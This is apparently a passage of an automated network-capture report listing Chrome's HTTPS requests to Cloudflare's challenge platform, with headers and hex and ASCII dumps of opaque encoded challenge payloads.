                                                      2024-04-16 11:56:33 UTC1369INData Raw: 67 45 35 7a 67 5a 6c 31 68 49 35 6e 6c 5a 61 62 6e 49 78 75 6e 4a 6d 67 63 47 61 6c 6c 47 43 6a 61 61 57 75 6d 36 61 4c 68 6f 36 42 71 4b 57 72 6d 5a 4b 6b 73 59 79 36 6c 6f 65 4b 6e 4c 78 2f 6b 72 76 42 6b 62 43 30 78 36 75 43 71 38 36 2f 75 35 7a 46 6e 5a 43 71 31 62 4b 34 74 36 4b 37 31 4c 50 54 76 35 6e 56 34 71 43 66 76 74 54 57 74 64 69 70 36 62 6e 42 75 2b 76 66 79 63 37 6d 38 75 37 4d 37 75 6a 45 30 64 4b 32 36 4d 76 77 32 76 37 30 32 62 73 44 2b 77 6e 54 30 63 6e 5a 33 50 72 45 42 65 62 4b 30 73 76 75 36 78 54 6e 42 2f 6e 37 45 77 77 55 46 2f 4d 52 41 2b 73 4d 45 77 55 6a 38 78 6a 6b 35 77 33 65 33 2f 66 35 44 75 7a 70 49 76 50 78 4c 69 38 59 4d 41 77 7a 48 66 55 2b 4c 52 34 39 44 30 45 67 48 44 2f 39 4b 43 6b 32 4b 55 70 4a 53 44 78 50 52 53 35
                                                      Data Ascii: gE5zgZl1hI5nlZabnIxunJmgcGallGCjaaWum6aLho6BqKWrmZKksYy6loeKnLx/krvBkbC0x6uCq86/u5zFnZCq1bK4t6K71LPTv5nV4qCfvtTWtdip6bnBu+vfyc7m8u7M7ujE0dK26Mvw2v702bsD+wnT0cnZ3PrEBebK0svu6xTnB/n7EwwUF/MRA+sMEwUj8xjk5w3e3/f5DuzpIvPxLi8YMAwzHfU+LR49D0EgHD/9KCk2KUpJSDxPRS5
                                                      2024-04-16 11:56:33 UTC1369INData Raw: 48 57 56 6e 6c 6c 31 66 58 52 67 67 58 68 76 59 59 4a 37 63 6e 36 6c 66 6f 68 32 6d 71 32 4b 71 36 32 31 6c 61 71 6a 71 62 6d 6a 70 6e 65 36 66 4b 70 36 63 37 4f 30 67 62 76 48 73 4a 57 2f 78 6f 71 72 69 36 6d 77 6e 61 71 6d 76 36 50 47 76 38 32 74 7a 4c 6d 71 30 36 2f 47 7a 74 54 59 74 70 75 6b 76 71 2f 57 34 74 58 68 75 74 57 70 34 73 37 6f 36 4e 44 72 35 39 33 41 32 4f 2f 46 31 62 48 59 32 37 44 78 31 2b 30 45 30 76 48 37 2b 66 76 34 36 63 50 65 2b 77 54 4f 2b 76 30 48 45 39 34 46 35 75 55 56 43 74 6a 35 43 75 2f 63 37 78 76 38 36 53 48 31 37 53 51 53 4a 4f 59 6c 41 66 6b 6e 48 69 6e 35 4b 53 55 4d 44 68 37 74 4a 6a 55 58 42 2f 49 59 4a 52 59 78 48 76 30 57 46 52 6b 54 51 78 30 77 4d 53 63 49 46 6a 55 73 4a 44 6f 77 43 6a 77 50 55 43 59 6e 54 52 67 6f
                                                      Data Ascii: HWVnll1fXRggXhvYYJ7cn6lfoh2mq2Kq621laqjqbmjpne6fKp6c7O0gbvHsJW/xoqri6mwnaqmv6PGv82tzLmq06/GztTYtpukvq/W4tXhutWp4s7o6NDr593A2O/F1bHY27Dx1+0E0vH7+fv46cPe+wTO+v0HE94F5uUVCtj5Cu/c7xv86SH17SQSJOYlAfknHin5KSUMDh7tJjUXB/IYJRYxHv0WFRkTQx0wMScIFjUsJDowCjwPUCYnTRgo
                                                      2024-04-16 11:56:33 UTC1369INData Raw: 74 33 66 48 68 79 64 58 69 65 6d 61 61 64 72 48 57 69 68 70 69 73 68 35 47 69 68 59 56 30 62 37 4b 30 65 59 71 51 73 48 69 4f 76 5a 64 31 74 70 69 53 66 36 43 37 78 71 76 45 6d 38 4f 4e 69 63 54 43 6b 49 76 45 74 73 4b 72 79 4c 62 49 71 37 69 6d 76 72 4c 62 72 2b 44 42 72 62 4b 66 73 72 50 6d 78 4f 6e 58 34 37 66 78 36 38 33 43 38 4f 61 2b 73 61 71 31 73 74 76 45 2f 73 6a 50 38 2b 4c 67 74 51 50 5a 35 4d 51 49 36 75 6a 6f 33 73 76 62 41 2b 63 50 35 67 54 67 2f 51 4c 4e 2b 4e 45 53 46 76 30 53 2f 50 55 42 41 4f 38 67 41 68 51 67 2b 43 67 71 4a 53 67 58 48 79 44 37 41 50 30 47 45 44 45 57 4a 77 6f 57 43 42 51 61 4b 66 6f 52 41 41 34 57 4a 41 4d 55 42 6a 41 31 41 69 41 61 53 41 52 4c 43 67 67 63 53 6c 4a 43 4e 69 4d 50 55 55 45 34 4c 45 6c 4f 4b 6a 5a 53 59
                                                      Data Ascii: t3fHhydXiemaadrHWihpish5GihYV0b7K0eYqQsHiOvZd1tpiSf6C7xqvEm8ONicTCkIvEtsKryLbIq7imvrLbr+DBrbKfsrPmxOnX47fx683C8Oa+saq1stvE/sjP8+LgtQPZ5MQI6ujo3svbA+cP5gTg/QLN+NESFv0S/PUBAO8gAhQg+CgqJSgXHyD7AP0GEDEWJwoWCBQaKfoRAA4WJAMUBjA1AiAaSARLCggcSlJCNiMPUUE4LElOKjZSY
                                                      2024-04-16 11:56:33 UTC1369INData Raw: 57 64 4a 32 46 6a 58 74 67 65 57 61 4d 68 36 4b 44 66 62 57 69 64 70 43 61 75 4c 46 38 6c 6e 65 2b 66 58 31 39 77 4d 44 42 76 70 75 46 69 63 4f 43 74 5a 76 49 72 73 61 4f 6a 61 69 6b 6c 70 48 4e 73 61 4b 52 73 73 2b 64 6e 4e 58 64 72 75 44 56 33 37 66 56 34 75 54 64 75 63 62 47 36 63 54 41 35 63 69 76 39 4e 54 67 32 4d 58 53 36 64 69 31 39 4e 33 58 2f 76 72 78 75 67 62 54 2b 4e 41 45 38 75 6a 31 42 2f 30 46 44 4d 67 45 30 4f 6b 4b 30 73 34 4c 44 52 58 79 35 66 76 6f 39 4e 6f 51 48 78 67 52 46 4f 44 39 2f 67 62 69 34 43 77 68 48 79 6f 74 34 75 6f 41 45 77 77 41 42 77 49 79 49 79 55 58 4f 52 6f 61 2f 41 77 61 39 42 6b 31 4a 68 49 42 2f 68 38 33 4e 41 51 4d 51 44 77 4a 4b 68 73 72 4c 30 4e 54 43 68 49 54 4a 6c 73 63 47 6b 31 57 4e 79 45 73 4f 6a 45 6b 56 53
                                                      Data Ascii: WdJ2FjXtgeWaMh6KDfbWidpCauLF8lne+fX19wMDBvpuFicOCtZvIrsaOjaiklpHNsaKRss+dnNXdruDV37fV4uTducbG6cTA5civ9NTg2MXS6di19N3X/vrxugbT+NAE8uj1B/0FDMgE0OkK0s4LDRXy5fvo9NoQHxgRFOD9/gbi4CwhHyot4uoAEwwABwIyIyUXORoa/Awa9Bk1JhIB/h83NAQMQDwJKhsrL0NTChITJlscGk1WNyEsOjEkVS


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.549728104.17.2.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:35 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1360135987:1713267177:eg-nWfnh6VWXyBLyYRHZmVxAI3xrmNba1OE1g2HfQMw/8753fe19daf9b0e5/0ac2a8def4e2792 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:35 UTC386INHTTP/1.1 400 Bad Request
                                                      Date: Tue, 16 Apr 2024 11:56:35 GMT
                                                      Content-Type: application/json
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      cf-chl-out: G+5PUBge4KWU4VievgOk3g==$Z5LvaGRyWNXTVb5YqtBWcA==
                                                      Server: cloudflare
                                                      CF-RAY: 8753fe32685844d6-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:35 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                      Data Ascii: 7invalid
                                                      2024-04-16 11:56:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.549731104.17.3.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:36 UTC775OUTGET /cdn-cgi/challenge-platform/h/b/i/8753fe19daf9b0e5/1713268593731/8Wn8SnzbY0rE6bf HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:36 UTC208INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:36 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Server: cloudflare
                                                      CF-RAY: 8753fe389b6507da-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:36 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 06 00 00 00 41 08 02 00 00 00 7d f3 42 cb 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                      Data Ascii: 3dPNGIHDRA}BIDAT$IENDB`
                                                      2024-04-16 11:56:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.549735104.17.3.1844435528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-16 11:56:39 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1360135987:1713267177:eg-nWfnh6VWXyBLyYRHZmVxAI3xrmNba1OE1g2HfQMw/8753fe19daf9b0e5/0ac2a8def4e2792 HTTP/1.1
                                                      Host: challenges.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 25704
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-type: application/x-www-form-urlencoded
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      CF-Challenge: 0ac2a8def4e2792
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://challenges.cloudflare.com
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/jgoie/0x4AAAAAAAQ_ajLYJ-oSKSIN/auto/normal
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-04-16 11:56:39 UTC16384OUTData Raw: 76 5f 38 37 35 33 66 65 31 39 64 61 66 39 62 30 65 35 3d 64 74 46 4c 77 31 68 55 43 31 74 59 62 7a 6d 70 37 51 64 51 59 4c 53 6a 6a 51 6d 4c 58 4b 70 55 68 64 51 68 4b 59 43 55 51 53 51 78 4c 42 6e 68 7a 51 48 25 32 62 51 68 43 32 51 30 51 46 39 32 7a 5a 53 71 5a 51 79 6b 4b 68 30 63 6a 51 68 56 51 33 56 6d 68 4f 59 78 4b 51 5a 73 55 76 4b 68 37 55 51 7a 43 68 68 64 51 33 74 43 6a 4c 68 4b 68 73 64 2b 46 70 4d 41 31 4b 32 68 67 51 63 6a 4c 62 73 51 41 4b 31 50 51 33 73 4a 53 43 46 51 51 39 32 51 64 43 4c 51 70 53 74 55 33 4c 4b 51 68 4e 6a 4e 30 68 4b 76 54 4b 51 38 24 49 45 5a 47 42 78 51 68 78 74 4e 6d 2b 45 6e 54 46 6a 6f 54 4b 51 52 6a 33 2b 41 54 46 6d 51 46 53 46 76 31 6a 36 34 37 43 6a 76 51 63 5a 45 34 48 2d 45 7a 50 4a 76 33 56 64 6b 34 73 7a 39
                                                      Data Ascii: v_8753fe19daf9b0e5=dtFLw1hUC1tYbzmp7QdQYLSjjQmLXKpUhdQhKYCUQSQxLBnhzQH%2bQhC2Q0QF92zZSqZQykKh0cjQhVQ3VmhOYxKQZsUvKh7UQzChhdQ3tCjLhKhsd+FpMA1K2hgQcjLbsQAK1PQ3sJSCFQQ92QdCLQpStU3LKQhNjN0hKvTKQ8$IEZGBxQhxtNm+EnTFjoTKQRj3+ATFmQFSFv1j647CjvQcZE4H-EzPJv3Vdk4sz9
                                                      2024-04-16 11:56:39 UTC9320OUTData Raw: 6a 51 7a 35 75 50 52 4e 74 63 52 4c 6c 53 4e 52 35 49 6c 74 4f 6c 51 76 32 51 4a 51 64 37 4e 67 73 66 35 67 4f 74 38 73 78 32 66 38 49 6c 4d 4c 4e 35 5a 68 69 4d 62 51 64 56 68 56 51 4e 53 6d 55 68 4c 51 35 74 2b 30 56 39 4b 54 4b 46 2b 4c 74 51 54 51 78 6d 68 32 54 70 61 6a 33 51 50 51 4e 6f 70 39 4f 63 57 47 49 2b 74 70 70 5a 4d 47 70 5a 51 49 51 69 72 35 32 68 59 51 56 32 7a 42 49 6a 76 54 4b 7a 33 51 77 4d 5a 4c 70 64 38 75 51 54 4c 66 32 68 63 5a 4d 46 41 38 68 78 51 56 51 78 35 68 31 4c 77 61 2b 70 46 55 6c 49 4d 4c 4b 33 74 31 37 57 33 32 31 41 51 58 4c 6e 4f 6a 74 57 37 73 37 56 31 34 51 30 46 41 7a 38 61 76 57 43 78 4b 70 75 51 52 51 46 43 70 63 51 6e 62 42 4c 51 41 50 37 32 42 4c 31 73 51 57 43 42 43 31 6a 32 4e 6f 66 70 67 55 4c 6f 51 42 4c 68
                                                      Data Ascii: jQz5uPRNtcRLlSNR5IltOlQv2QJQd7Ngsf5gOt8sx2f8IlMLN5ZhiMbQdVhVQNSmUhLQ5t+0V9KTKF+LtQTQxmh2Tpaj3QPQNop9OcWGI+tppZMGpZQIQir52hYQV2zBIjvTKz3QwMZLpd8uQTLf2hcZMFA8hxQVQx5h1Lwa+pFUlIMLK3t17W321AQXLnOjtW7s7V14Q0FAz8avWCxKpuQRQFCpcQnbBLQAP72BL1sQWCBC1j2NofpgULoQBLh
                                                      2024-04-16 11:56:40 UTC327INHTTP/1.1 200 OK
                                                      Date: Tue, 16 Apr 2024 11:56:40 GMT
                                                      Content-Type: text/plain; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-chl-gen: jSkjqB/LDNKHdM47Ljhx3Zimv+WQ5noWFXqLiFxiLep7xz2WM9qPjQBp4opnELyA$nK5AUz2xuxJZ9yGVJlfP0Q==
                                                      Server: cloudflare
                                                      CF-RAY: 8753fe4acd9b1373-ATL
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-04-16 11:56:40 UTC1042INData Raw: 35 38 32 30 0d 0a 68 56 70 35 69 35 4e 4f 59 6d 43 47 5a 31 56 71 69 48 6c 59 61 6c 69 59 6a 35 4b 50 58 5a 75 57 6b 32 47 58 59 49 70 6c 67 6f 57 66 66 4c 43 4a 70 59 71 66 67 59 32 52 70 6e 6d 51 69 35 53 62 6d 48 2b 6f 65 4b 47 35 6d 63 4f 30 67 70 6d 35 6f 36 69 6e 76 61 57 63 67 70 48 4a 70 71 36 52 7a 34 32 6d 69 35 4f 33 6d 4e 54 54 6e 4a 6e 4c 33 37 58 59 32 4e 2f 50 76 74 54 66 76 2b 75 74 35 62 66 51 38 63 6a 79 34 71 7a 44 35 76 65 77 79 2b 37 58 79 37 6b 41 32 50 6a 50 7a 66 66 52 35 63 59 4b 35 74 33 6c 33 41 4c 6f 44 77 63 44 36 51 54 6f 43 2b 6b 59 43 77 66 70 44 74 73 55 38 66 6b 54 44 2f 54 73 33 79 50 31 38 65 63 6d 42 69 51 6b 33 2f 7a 6c 4d 69 48 77 43 65 34 6f 49 41 63 34 2b 52 41 33 42 7a 41 56 50 41 6b 52 2b 78 5a 42 45 67 49 39 51
                                                      Data Ascii: 5820hVp5i5NOYmCGZ1VqiHlYaliYj5KPXZuWk2GXYIplgoWffLCJpYqfgY2RpnmQi5SbmH+oeKG5mcO0gpm5o6invaWcgpHJpq6Rz42mi5O3mNTTnJnL37XY2N/PvtTfv+ut5bfQ8cjy4qzD5vewy+7Xy7kA2PjPzffR5cYK5t3l3ALoDwcD6QToC+kYCwfpDtsU8fkTD/Ts3yP18ecmBiQk3/zlMiHwCe4oIAc4+RA3BzAVPAkR+xZBEgI9Q
                                                      2024-04-16 11:56:40 UTC1369INData Raw: 6a 6f 36 56 68 6e 64 56 6d 46 74 68 59 35 31 69 70 5a 57 47 70 6d 57 63 72 58 36 46 61 61 42 37 71 32 79 48 69 4b 4b 58 73 59 4b 79 63 72 47 61 69 36 43 39 72 58 74 2f 6f 36 61 41 6b 4c 2b 79 6d 63 62 49 71 6f 71 61 70 71 36 61 6f 6f 62 4c 71 49 6e 58 73 39 44 58 73 4c 69 65 7a 62 65 64 6d 4d 32 68 77 39 33 54 75 75 44 58 33 37 6a 47 75 75 50 47 79 72 37 75 76 74 43 74 74 38 62 56 31 75 72 4b 37 75 2f 62 75 64 33 66 30 4e 62 68 34 76 55 43 34 72 7a 73 44 64 6a 57 36 77 67 48 34 66 41 57 7a 2f 59 4f 36 52 58 6e 43 67 58 5a 45 66 45 42 47 53 50 72 47 64 38 53 46 51 72 34 47 75 6f 6e 44 43 38 4b 44 76 6f 74 36 79 6b 50 49 2f 45 6c 37 7a 63 51 46 44 6b 37 47 68 49 51 4f 6a 4d 39 52 43 41 6d 42 6b 59 6f 51 76 34 45 4a 30 34 6c 42 42 73 77 53 30 59 6c 4c 79 59
                                                      Data Ascii: jo6VhndVmFthY51ipZWGpmWcrX6FaaB7q2yHiKKXsYKycrGai6C9rXt/o6aAkL+ymcbIqoqapq6aoobLqInXs9DXsLiezbedmM2hw93TuuDX37jGuuPGyr7uvtCtt8bV1urK7u/bud3f0Nbh4vUC4rzsDdjW6wgH4fAWz/YO6RXnCgXZEfEBGSPrGd8SFQr4GuonDC8KDvot6ykPI/El7zcQFDk7GhIQOjM9RCAmBkYoQv4EJ04lBBswS0YlLyY
                                                      2024-04-16 11:56:40 UTC1369INData Raw: 4b 42 30 67 5a 53 64 68 34 57 69 6e 48 6d 72 6c 61 74 6e 6a 49 52 2b 70 4b 4f 6b 67 6e 4f 56 6b 71 32 4a 64 37 79 74 64 62 4b 54 6b 34 2b 31 73 72 46 38 76 49 57 42 69 63 4f 59 79 63 75 46 70 64 48 44 7a 63 75 69 7a 72 2b 59 7a 63 72 5a 6d 4d 7a 4d 33 4e 75 65 31 73 75 31 30 4f 50 6e 76 4b 4b 71 70 4c 7a 71 75 36 47 6e 71 72 7a 4d 77 73 66 31 7a 4f 33 4d 36 50 44 54 32 63 37 58 38 64 37 2b 42 4c 62 41 30 73 4d 41 41 67 50 6c 2f 51 4c 41 37 51 49 49 43 38 77 42 43 77 7a 76 42 76 4c 4d 45 42 34 5a 47 42 44 63 47 78 72 75 48 51 58 6d 34 53 54 6f 41 52 55 4e 35 4f 58 38 42 77 30 41 42 53 45 58 39 42 62 75 4c 52 44 30 47 66 33 39 48 78 63 34 41 79 51 7a 49 7a 59 64 4e 43 42 46 53 43 34 76 53 6a 41 6d 51 6c 42 54 45 43 6f 50 4a 6a 56 45 4d 55 59 59 4f 68 34 64
                                                      Data Ascii: KB0gZSdh4WinHmrlatnjIR+pKOkgnOVkq2Jd7ytdbKTk4+1srF8vIWBicOYycuFpdHDzcuizr+YzcrZmMzM3Nue1su10OPnvKKqpLzqu6GnqrzMwsf1zO3M6PDT2c7X8d7+BLbA0sMAAgPl/QLA7QIIC8wBCwzvBvLMEB4ZGBDcGxruHQXm4SToARUN5OX8Bw0ABSEX9BbuLRD0Gf39Hxc4AyQzIzYdNCBFSC4vSjAmQlBTECoPJjVEMUYYOh4d
                                                      2024-04-16 11:56:40 UTC1369INData Raw: 4f 66 64 6e 56 33 70 58 2b 72 72 5a 71 4b 69 48 36 4a 62 49 57 75 74 35 6c 7a 74 57 36 70 65 34 6c 32 69 37 65 78 74 4a 36 63 73 49 69 48 77 4c 2b 2f 70 70 2b 39 67 70 43 6d 79 36 6e 48 73 38 65 71 79 70 4b 54 70 4d 2f 54 6c 39 4c 66 33 74 72 45 6e 4e 44 5a 70 75 58 41 35 75 6e 4a 33 4b 37 75 37 61 6a 4b 72 63 76 4f 39 38 66 74 38 4d 7a 74 32 50 48 36 34 50 32 2f 32 73 54 41 34 66 62 6e 35 74 66 70 33 2f 77 47 42 63 6a 64 42 51 66 6c 37 4f 49 4d 38 75 72 7a 30 66 50 2b 48 4f 30 57 38 2f 6e 68 39 2f 34 41 39 68 67 69 48 79 45 66 43 51 73 49 4a 43 41 6e 36 65 73 42 4b 67 77 31 4d 79 38 46 44 2f 77 30 43 77 76 39 4d 77 51 53 49 54 59 33 49 79 51 64 2f 52 55 66 44 79 39 4e 45 45 34 7a 55 78 4e 54 56 54 55 53 45 53 74 56 46 68 45 75 50 42 31 4f 51 30 45 6a 59
                                                      Data Ascii: OfdnV3pX+rrZqKiH6JbIWut5lztW6pe4l2i7extJ6csIiHwL+/pp+9gpCmy6nHs8eqypKTpM/Tl9Lf3trEnNDZpuXA5unJ3K7u7ajKrcvO98ft8Mzt2PH64P2/2sTA4fbn5tfp3/wGBcjdBQfl7OIM8urz0fP+HO0W8/nh9/4A9hgiHyEfCQsIJCAn6esBKgw1My8FD/w0Cwv9MwQSITY3IyQd/RUfDy9NEE4zUxNTVTUSEStVFhEuPB1OQ0EjY
                                                      2024-04-16 11:56:40 UTC1369INData Raw: 65 6a 4a 46 75 62 61 47 70 64 59 79 46 64 4c 53 6a 6a 5a 47 58 75 4a 4b 67 72 37 33 42 78 4a 43 6e 6f 4a 53 43 71 4c 4f 73 6d 61 6d 49 7a 4c 2f 53 78 4b 2b 53 71 36 71 34 6d 4d 58 50 72 4d 72 58 73 72 75 78 73 4a 32 30 6f 64 58 48 34 37 62 55 76 2b 4b 72 77 65 43 74 35 4f 58 75 76 72 58 75 34 72 48 47 35 75 54 5a 75 62 44 65 36 72 33 52 34 4e 76 4e 31 38 4d 49 41 67 48 31 2f 73 7a 36 41 65 37 51 2f 75 34 49 42 65 4c 69 47 68 50 57 48 4f 33 38 33 66 34 5a 34 41 2f 68 33 52 37 79 2b 65 4c 79 47 41 76 6e 49 79 6a 35 4b 67 51 4d 46 42 45 51 4b 52 6a 75 37 79 67 70 4a 77 38 64 50 78 67 64 48 79 51 2b 51 7a 77 32 4e 53 67 46 51 78 68 49 44 52 73 71 4b 56 4d 6d 54 69 64 4a 53 43 6f 6c 52 31 4d 34 47 54 63 6f 4b 6b 34 38 51 30 52 63 51 6c 70 57 52 57 77 37 4a 53
                                                      Data Ascii: ejJFubaGpdYyFdLSjjZGXuJKgr73BxJCnoJSCqLOsmamIzL/SxK+Sq6q4mMXPrMrXsruxsJ20odXH47bUv+KrweCt5OXuvrXu4rHG5uTZubDe6r3R4NvN18MIAgH1/sz6Ae7Q/u4IBeLiGhPWHO383f4Z4A/h3R7y+eLyGAvnIyj5KgQMFBEQKRju7ygpJw8dPxgdHyQ+Qzw2NSgFQxhIDRsqKVMmTidJSColR1M4GTcoKk48Q0RcQlpWRWw7JS
                                                      2024-04-16 11:56:40 UTC1369INData Raw: 74 61 43 33 62 72 65 30 72 49 32 46 66 6f 75 4b 76 4a 65 53 66 58 79 65 75 34 6a 4b 77 38 69 62 7a 63 6a 51 70 70 6e 51 77 37 50 53 74 38 53 70 6f 36 2b 6a 71 36 6d 76 7a 4c 47 74 71 72 61 62 6e 4e 44 58 71 4c 47 70 75 72 37 71 78 75 7a 49 73 65 47 37 7a 4c 36 31 79 72 47 72 73 4e 62 47 76 62 37 4c 30 51 48 42 77 64 57 38 32 62 33 54 79 64 37 62 32 4e 62 57 34 63 63 51 2f 41 7a 55 33 39 58 32 30 64 44 79 45 66 41 63 33 52 6a 67 47 2f 59 56 2b 79 63 66 49 4e 37 78 36 66 76 32 37 51 59 70 38 50 44 6f 4b 51 4c 6e 44 41 41 46 2b 54 49 38 38 6a 73 70 45 78 4c 34 43 7a 6b 65 51 7a 45 35 46 30 4d 66 49 78 39 4c 4e 31 45 68 55 78 49 50 49 46 55 76 4b 78 45 69 45 56 55 64 4a 6a 5a 4e 4c 69 34 38 4d 79 55 59 48 52 35 71 48 46 56 4c 4b 43 55 33 53 79 70 6e 52 69 59
                                                      Data Ascii: taC3bre0rI2FfouKvJeSfXyeu4jKw8ibzcjQppnQw7PSt8Spo6+jq6mvzLGtqrabnNDXqLGpur7qxuzIseG7zL61yrGrsNbGvb7L0QHBwdW82b3Tyd7b2NbW4ccQ/AzU39X20dDyEfAc3RjgG/YV+ycfIN7x6fv27QYp8PDoKQLnDAAF+TI88jspExL4CzkeQzE5F0MfIx9LN1EhUxIPIFUvKxEiEVUdJjZNLi48MyUYHR5qHFVLKCU3SypnRiY
                                                      2024-04-16 11:56:40 UTC1369INData Raw: 62 78 7a 75 33 6e 41 67 4c 43 53 78 58 64 38 6d 35 64 2f 6f 59 57 4a 66 34 54 51 6a 59 65 61 6e 35 79 48 78 4d 53 58 6a 37 48 5a 70 5a 50 4d 71 70 32 67 6d 4c 61 68 72 70 7a 6f 6d 71 69 67 6f 5a 36 6a 32 38 4f 34 6f 2b 2f 70 77 36 66 7a 38 4c 65 34 39 37 4c 46 76 50 76 53 76 38 71 34 42 63 50 45 76 4d 47 2b 75 77 6a 69 44 63 50 38 2b 64 6e 5a 36 75 4c 54 78 78 58 69 32 4d 76 51 31 75 76 6c 35 75 72 66 31 79 44 64 4a 65 51 6b 49 65 6a 79 34 43 58 73 37 43 7a 75 2b 4f 63 68 2f 76 50 39 44 75 34 49 36 7a 67 39 50 51 59 73 4f 55 4c 33 4d 50 31 46 39 7a 55 31 42 68 49 34 48 2f 34 41 54 43 63 51 47 69 70 52 45 78 38 4e 55 56 6b 5a 57 53 67 6d 4a 6b 78 5a 48 78 68 67 57 6a 51 63 56 46 34 78 4d 6b 4a 70 4c 54 5a 63 63 53 4d 6b 63 57 45 31 4c 43 30 7a 51 6a 6c 34
                                                      Data Ascii: bxzu3nAgLCSxXd8m5d/oYWJf4TQjYean5yHxMSXj7HZpZPMqp2gmLahrpzomqigoZ6j28O4o+/pw6fz8Le497LFvPvSv8q4BcPEvMG+uwjiDcP8+dnZ6uLTxxXi2MvQ1uvl5urf1yDdJeQkIejy4CXs7Czu+Och/vP9Du4I6zg9PQYsOUL3MP1F9zU1BhI4H/4ATCcQGipREx8NUVkZWSgmJkxZHxhgWjQcVF4xMkJpLTZccSMkcWE1LC0zQjl4
                                                      2024-04-16 11:56:40 UTC1369INData Raw: 7a 42 6a 37 79 30 74 49 57 49 79 4a 32 74 78 4d 76 45 6a 49 4f 2f 30 61 57 4c 78 4b 4f 6e 30 4a 44 45 73 61 57 64 6c 71 76 59 34 4d 2f 59 72 64 54 54 6f 4e 79 38 6f 72 71 66 33 4c 33 4f 75 65 76 62 72 4f 6a 49 30 64 61 35 38 75 58 4c 39 4e 58 6e 2f 73 71 2f 33 72 30 48 7a 74 33 36 30 67 6e 58 31 67 4c 34 44 74 73 4a 32 67 48 52 78 77 58 70 2b 52 76 69 38 51 2f 6d 31 4e 6e 53 36 52 45 51 46 2b 55 68 33 76 4d 72 41 77 4d 43 39 65 33 6d 2b 79 6b 4c 49 43 66 39 4a 53 54 30 4e 41 51 4b 4c 54 49 6f 43 42 6f 34 51 52 51 55 52 68 67 69 52 44 30 35 48 42 78 4a 4d 43 70 4d 52 55 45 6b 4a 45 31 45 51 46 4d 6a 47 44 73 57 58 79 63 32 56 43 73 5a 47 79 39 61 55 57 59 30 59 55 4e 5a 4b 69 51 33 51 6c 4a 7a 4f 30 70 6f 50 79 30 79 4f 55 4a 70 61 48 49 2b 65 54 64 4d 65
